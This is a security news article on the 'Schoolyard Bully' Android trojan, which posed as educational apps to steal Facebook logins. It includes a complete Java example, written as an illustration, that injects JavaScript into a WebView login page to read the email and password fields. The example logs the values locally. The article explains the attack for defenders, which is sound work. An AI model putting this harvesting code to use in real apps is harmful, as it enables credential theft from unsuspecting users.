An Android malware campaign impersonating reading and education apps has been running since 2018, attempting to steal Facebook account credentials from infected devices.

According to a new report from Zimperium, the campaign has infected at least 300,000 devices in 71 countries, mostly focusing on Vietnam.

Map of victims (Zimperium)

Some apps used to spread the Trojan, which Zimperium has named “Schoolyard Bully”, were previously on Google Play but have since been removed.

However, Zimperium warns that apps continue to be released through third-party Android app stores.

A schoolyard bully

The Schoolyard Bully malware gets its name from the fact that it masquerades as harmless and even beneficial educational apps.

However, the real purpose of these apps is to steal the victim's Facebook credentials (email address or phone number, and password) together with the Facebook account ID and username, plus basic device fingerprinting data: device name, installed RAM and Android API level.

Trojan apps and Facebook login prompt (Zimperium)

Rather than handing the login off to the browser or Facebook's own SDK, the Trojan loads the genuine Facebook login page inside an in-app WebView. Because the app controls that WebView, it can inject its own JavaScript into the page and read whatever the user types into the form, while the user sees nothing but the real Facebook login screen.

“JavaScript is injected into WebView using ‘evaluateJavascript’ method,” explains Zimperium.

“The JavaScript code extracts the value of items with ids ‘m_login_email’ and ‘m_login_password’, which are placeholders for phone number, email address and password.”

JavaScript injected (Zimperium)
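To make the mechanism concrete, the following is an illustration of the WebView injection the report describes, written for this article rather than taken from the Schoolyard Bully samples. Only the evaluateJavascript API and the two element ids, m_login_email and m_login_password, come from Zimperium's analysis; the class name, log tag, polling interval, login URL and the exact script body are assumptions, and the captured values are only written to the local log, with no exfiltration.

```java
import android.app.Activity;
import android.os.Bundle;
import android.os.Handler;
import android.os.Looper;
import android.util.Log;
import android.webkit.ValueCallback;
import android.webkit.WebView;
import android.webkit.WebViewClient;

// Illustration (written for this article, not malware source) of how an app
// that hosts a login page in its own WebView can read the form: the page is
// genuine, but the host app injects JavaScript into it with evaluateJavascript.
public class WebViewLoginActivity extends Activity {
    private static final String TAG = "WebViewHarvestDemo"; // assumption
    private static final long POLL_MS = 500;                 // assumption

    // Script handed to evaluateJavascript. It looks up the two inputs by the
    // ids named in the report and, once both are filled in, returns them as a
    // JSON string; the return value is delivered to the ValueCallback in the
    // app's native code. Returns null while either field is still empty.
    private static final String HARVEST_JS =
        "(function(){" +
        "  var e = document.getElementById('m_login_email');" +
        "  var p = document.getElementById('m_login_password');" +
        "  if (!e || !p || !e.value || !p.value) return null;" +
        "  return JSON.stringify({email: e.value, password: p.value});" +
        "})();";

    private final Handler handler = new Handler(Looper.getMainLooper());
    private WebView webView;
    private boolean captured = false;

    // Re-runs the script on a timer: onPageFinished fires before the user has
    // typed anything, so the fields have to be re-read until they are filled.
    private final Runnable poll = new Runnable() {
        @Override
        public void run() {
            if (captured) return;
            webView.evaluateJavascript(HARVEST_JS, new ValueCallback<String>() {
                @Override
                public void onReceiveValue(String value) {
                    // evaluateJavascript returns the script's result as a JSON
                    // literal, so a null result arrives as the string "null".
                    if (value != null && !"null".equals(value)) {
                        captured = true;
                        // A real stealer would send this, with the device
                        // details the report lists, to its C2; here it is only logged.
                        Log.d(TAG, "form values read from WebView: " + value);
                        return;
                    }
                    handler.postDelayed(poll, POLL_MS);
                }
            });
        }
    };

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        setContentView(webView);
        webView.getSettings().setJavaScriptEnabled(true);

        webView.setWebViewClient(new WebViewClient() {
            @Override
            public void onPageFinished(WebView view, String url) {
                // Page (and every later navigation) has rendered; start polling.
                handler.post(poll);
            }
        });

        // The real login page is loaded over HTTPS and rendered unmodified;
        // nothing visible tells the user that the host app can read the form.
        // The exact URL is an assumption.
        webView.loadUrl("https://m.facebook.com/login");
    }

    @Override
    protected void onDestroy() {
        handler.removeCallbacks(poll);
        super.onDestroy();
    }
}
```

The point for defenders is that the harvesting happens entirely inside the app's process, after TLS has been terminated and before anything leaves the device, so nothing on Facebook's side can detect it. The only reliable user-side defence is to refuse to type Facebook credentials into any third-party app's embedded login page and to sign in through the browser or Facebook's own app instead. For analysts triaging an APK, a WebView pointed at a login page combined with evaluateJavascript and strings such as m_login_email and m_login_password, whether in the Dalvik code or in a bundled native library, is the pattern to look for.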

Additionally, the malware keeps part of its logic in native (compiled) libraries rather than in the app's Dalvik bytecode, which hides it from security software and static scanners that only inspect the Java/Kotlin side of the app.

Victims and attribution

Zimperium says it has detected this malware on 300,000 victim devices in 71 countries, based on its own telemetry.

Additionally, since the 37 apps associated with this campaign are distributed through third-party app stores, the real number of victims is likely higher, as there is no reliable way to measure installs on those platforms.

Zimperium also warns that there are likely other apps behind this campaign besides those its researchers have discovered.

The threat actors behind the Schoolyard Bully Trojan are unknown, but analysts have been able to determine that the malware is not associated with Operation FlyTrap, an earlier campaign that also attempted to steal Facebook accounts and also focused on Vietnam.

